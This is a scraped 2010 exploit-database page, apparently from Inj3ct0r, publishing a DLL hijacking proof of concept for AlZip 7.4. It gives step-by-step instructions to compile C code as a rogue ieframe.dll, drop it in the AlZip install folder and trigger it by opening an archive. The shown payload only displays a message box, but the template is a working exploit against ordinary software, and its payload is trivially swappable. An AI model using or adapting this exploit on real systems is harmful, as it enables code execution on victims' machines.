Home / os / win7

[local exploits] - AlZip v7.4 DLL Hijacking Exploit (ieframe

Posted on 08 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>AlZip v7.4 DLL Hijacking Exploit (ieframe.dll) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='AlZip v7.4 DLL Hijacking Exploit (ieframe.dll) by Pepelux in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================== AlZip v7.4 DLL Hijacking Exploit (ieframe.dll) ============================================== $ Program: AlZip $ Version: 7.4 $ Download: http://www.altools.com/ Found by Pepelux &lt;pepelux[at]enye-sec.org&gt; http://www.pepelux.org eNYe-Sec - www.enye-sec.org Tested on: Windows XP SP2 &amp;&amp; Windows XP SP3 Extensions: &quot; .rar &amp;&amp; .r00 ... .r99 &amp;&amp; .zoo &quot; How to use : 1&gt; Compile this code as ieframe.dll gcc -shared -o ieframe.dll thiscode.c 2&gt; Move DLL file to the directory where AlZip is installed 3&gt; Open any file in &#039;Extensions&#039; */ #include &lt;windows.h&gt; #define DllExport __declspec (dllexport) int m0nk() { MessageBox(0, &quot;DLL Hijacking vulnerable&quot;, &quot;Pepelux&quot;, MB_OK); return 0; } BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {m0nk();} # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-08]</pre></body></html>

 

TOP